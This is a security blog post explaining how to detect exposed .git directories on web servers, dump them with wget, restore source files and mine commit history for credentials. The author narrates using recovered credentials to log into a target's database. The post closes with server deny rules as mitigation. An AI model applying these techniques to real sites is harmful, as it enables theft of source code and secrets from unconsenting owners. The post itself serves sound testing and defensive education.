Git Exposed - How to Identify and Exploit

CUPC4K3
Published in stolabs
6 min read · Nov 18, 2022


What is Git?

Git is the most widely used version control tool in application development. It keeps a complete history of the code, so developers always have an up-to-date copy and fine-grained control over every change.

Today many applications use Git not only to version the code but also to publish it, for example by running git clone or git pull directly on the web server. Git itself does its job well, but deploying it that way creates a new way to leak the source.

Because it is so widely used, the mistake is common enough to be worth describing in detail: the exposed .git directory.

Dangers of Git Exposed

The danger arises when an application deployed from a Git checkout leaves the “.git” directory reachable over HTTP. That directory sits at the root of the checkout, not the system root, and when the checkout is the web root the server will serve it like any other path unless told otherwise.

This directory is the complete repository, not just a copy of the current source: it holds every commit ever made. It can contain API keys, AWS credentials, developer comments, even the password to a system’s administrative screen, and the log of all changes made during development, which means a secret that was later removed or rotated is still recoverable from history.

Finding the exposed Git

There are numerous ways to locate an exposed .git directory, but we will focus on the main techniques.

The simplest is manual. As the screenshot below shows, the repository was found just by requesting /.git/ on the target domain. When directory listing is disabled, request /.git/HEAD instead: an exposed repository answers with a line such as ref: refs/heads/master, whereas a catch-all page that returns 200 for every path will not, so check the body and not only the status code.

1. DotGit Extension

There is an extension for Firefox and Chrome called DotGit. As its description says, “It is an extension to check if a site accessed by the user has an exposed .git repository”. I accessed the site and the extension immediately flagged the exposed .git on the page.

Pop-up extension notifying git exposed

Clicking the extension icon shows the site with the exposed .git and also offers the option to download it.

Accessing the extension we can see the download option

2. Fuzzing

There are numerous tools for fuzzing directories and files; being a very visual person, I use and like feroxbuster.

If you don’t know this tool yet, you can find it here: https://github.com/epi052/feroxbuster

With feroxbuster you “fuzz” the target by brute-forcing directory and file names from a wordlist; any wordlist that contains .git (or .git/HEAD) will surface the repository, as in the screenshot below.

Locating .git via feroxbuster
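The manual request and the fuzzer hit above produce the same raw signal, a 200 response for something under /.git/, and the only thing that separates a real finding from a catch-all page is the response body. The script below is an added example, not part of the original post: it validates the body of /.git/HEAD (and /.git/config as a second signal) before calling a host exposed, and the same probe, run again after the rules in the Mitigation section are in place, should report blocked or absent. The host name target.example is a placeholder.

```shell
# Added example, not part of the original post: validate what a 200 for
# /.git/HEAD actually contains before declaring a repository exposed.
# target.example below is a placeholder host name.

# A real .git/HEAD is either a symbolic ref ("ref: refs/heads/<branch>") or,
# for a detached HEAD, a bare 40-hex commit id. HTML, a login redirect or a
# catch-all 200 page is none of those.
git_head_looks_exposed() {
    first=$(printf '%s' "$1" | head -n 1 | tr -d '\r')
    case "$first" in
        "ref: refs/"*) return 0 ;;
    esac
    printf '%s\n' "$first" | grep -Eq '^[0-9a-f]{40}$'
}

# A readable .git/config starts with the [core] section; use it as a second,
# independent signal so a HEAD-shaped body is not enough on its own.
git_config_looks_exposed() {
    printf '%s' "$1" | grep -Eq '^\[core\]'
}

# Probe one site. Prints exposed, probable, blocked, absent or unknown.
# Usage: probe_git_exposed https://target.example
probe_git_exposed() {
    base="${1%/}"
    tmp=$(mktemp)
    status=$(curl -s -L --max-time 10 -o "$tmp" -w '%{http_code}' "$base/.git/HEAD")
    body=$(cat "$tmp"); rm -f "$tmp"
    case "$status" in
        200)
            if git_head_looks_exposed "$body"; then
                cfg=$(curl -s -L --max-time 10 "$base/.git/config")
                if git_config_looks_exposed "$cfg"; then echo exposed; else echo probable; fi
            else
                echo unknown      # 200 but not a git file: catch-all page
            fi ;;
        403) echo blocked ;;      # what the deny rules in the Mitigation section return
        404) echo absent ;;
        *)   echo unknown ;;
    esac
}
```

Run it as probe_git_exposed https://target.example. A 200 with an HTML body comes back as unknown, which is what you want from a site that answers 200 to every path, and a 403 after the fix confirms the deny rule is in front of the directory.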

3. Downloading with WGET

To download the exposed repository we use wget, as shown below:

Downloading .git via the wget command

wget: a free, Linux-native program that downloads data from the web.

--mirror: recursive download with unlimited depth and timestamping, so wget follows the directory listing and fetches everything under .git.

-I .git (short for --include-directories): restricts the recursion to the .git directory, so the rest of the site is not crawled.

This only works when the server returns a directory listing for /.git/. If listing is disabled, the repository has to be reconstructed from known file names (HEAD, config, refs, the index and the objects they point to) rather than mirrored.

Whichever technique you use to download .git, a folder named after the target site is created, as shown below.

Site domain folder

Inside the target folder we check whether there is content we can restore.

To check the repository state we use:

git status

Because we downloaded only the .git directory and not the working tree, git status lists every tracked file as deleted. To recover them from the index we can use either of the two commands below:

git checkout -- .
or
git restore .

Running ls then shows the files we have successfully restored.

As stated at the beginning of the article, a repository can contain many files with sensitive data. Immediately we spot a very interesting file: admin.php

As we can see, admin.php gives us the database host and credentials; we will use this information shortly.

Reading the Logs

To read the history, use this command:

git log

git log lists every commit reachable from HEAD: the hash of each commit, its author, date and message, and other metadata. Commit messages alone are often enough to point at the interesting changes.

Reading Commits:
To inspect a single commit, use the following command:

git show <commit-id>

git show prints the commit metadata together with its full diff, so when a commit changes a credential both the old and the new value are visible side by side.

Interestingly, in this commit we saw that the developer changed the password for accessing the database, in exactly the file we were able to restore: admin.php
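To make the restore and history steps above (git status, git checkout -- ., git log, git show) reproducible without a live target, here is an added example rather than the post's own commands. It builds a throwaway repository in which a database password is committed and then changed, deletes the working tree to mimic what a download of .git alone leaves behind, and then recovers both the current and the previous credential. It assumes git is installed; target.example, admin.php and the two passwords are constructed placeholders, and dump_exposed_git wraps the wget invocation from the download section and is not run by the demo.

```shell
# Added example (not from the original post). Requires git. Host names, file
# names and passwords are constructed placeholders.

# The download step from earlier in the article: mirror only the .git tree.
# Needs a directory listing on /.git/ to work; not executed by the demo below.
dump_exposed_git() {
    wget --mirror --no-parent -I .git "$1/.git/"
}

# Build a throwaway repository that looks like a dumped .git: two commits,
# the second one "rotating" a database password, and no working tree.
make_fixture_repo() {
    dir=$(mktemp -d)
    git -C "$dir" init -q
    git -C "$dir" config user.email dev@target.example
    git -C "$dir" config user.name dev
    printf '<?php $db_pass = "OldSecret1";\n' > "$dir/admin.php"
    git -C "$dir" add admin.php
    git -C "$dir" commit -q -m "add admin panel"
    printf '<?php $db_pass = "NewSecret2";\n' > "$dir/admin.php"
    git -C "$dir" commit -q -a -m "change db password"
    rm "$dir/admin.php"        # only .git survives a download of the repo dir
    printf '%s\n' "$dir"
}

# git status reports every tracked file as deleted; checkout brings them back
# from the index (git restore . is the modern equivalent).
restore_working_tree() {
    git -C "$1" status --short
    git -C "$1" checkout -- .
}

# Commit subjects that added or removed an exact string (pickaxe search).
commits_touching() {
    git -C "$1" log --format=%s -S"$2"
}

# Extract $db_pass from admin.php at any revision, e.g. HEAD or HEAD~1.
db_pass_at() {
    git -C "$1" show "$2:admin.php" | sed -n 's/.*\$db_pass = "\([^"]*\)".*/\1/p'
}

# Quick triage of the restored tree for credential-looking identifiers.
grep_secrets() {
    git -C "$1" grep -n -i -E 'pass(word)?|secret|api[_-]?key|aws' -- . || true
}

# Walk-through mirroring the article's steps on the fixture.
demo() {
    repo=$(make_fixture_repo)
    restore_working_tree "$repo"
    git -C "$repo" log --oneline
    echo "current password:  $(db_pass_at "$repo" HEAD)"
    echo "previous password: $(db_pass_at "$repo" HEAD~1)"
    commits_touching "$repo" OldSecret1
    grep_secrets "$repo"
}
```

Run demo to see the sequence end to end. The pickaxe search (git log -S) is the general form of what git show revealed above: it finds every commit in which a given string appeared or disappeared, so rotated secrets turn up even when the commit message says nothing about them.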

Accessing the target database

Returning to the files we managed to restore, we identified the file “Envoy.blade.php”.

Laravel Envoy is a tool for executing common tasks you run on your remote servers. Using Blade-style syntax, you can easily set up tasks for deployment, Artisan commands, and more.

As you can see, an array of servers is defined at the top of the file, allowing you to reference those servers by name. Within your task declarations you place the shell commands that should execute on those servers when the task is invoked.

Although the credentials in admin.php point to the database on localhost, the Envoy file maps the web server to the application’s public IP; a deployment file like this is exactly where an attacker learns which hosts exist.

We could run a port scan on this IP, but I decided to dare and try connecting directly to the host with the mysql client and look at the result.

Wow, we have successfully gained access to our target’s entire database.

Mitigation

To fix this vulnerability, either keep the .git folder off the web server (deploy an export of the code, or keep the checkout outside the document root) or deny all HTTP access to .git paths. Doing both is best: a later git-based redeploy can silently bring the directory back, and the deny rule then still protects it. After applying a rule, request /.git/HEAD and confirm you get a 403 or 404 rather than a ref: line.

Lighttpd

Load mod_access and deny every URL that starts with /.git:

server.modules += ( "mod_access" )
$HTTP["url"] =~ "^/\.git" { url.access-deny = ( "" ) }

Apache 2.2

For Apache 2.2 modify the httpd.conf as follows:

<DirectoryMatch "^/.*/\.git/">
Order deny,allow
Deny from all
</DirectoryMatch>

Apache 2.4

For Apache 2.4 modify the httpd.conf as follows:

<DirectoryMatch "^/.*/\.git/">
Require all denied
</DirectoryMatch>

Nginx

If you use Nginx, put this block before any other regex location (for example the PHP handler) in the server block of your nginx.conf; regex locations are tried in the order they appear, and the dot must be escaped or the pattern also matches unrelated paths:

location ~ /\.git {
deny all;
}

deny all answers with 403, which still reveals that the directory exists; use return 404; instead if you would rather not confirm it.

Conclusions

I hope you enjoyed the article and that it helped a bit by showing you what Git is and the dangers associated with its misuse in a realistic environment.

This was just a brief summary about Git and its functionality, I think this should be a good start… Keep Learning!

See you soon, bye.
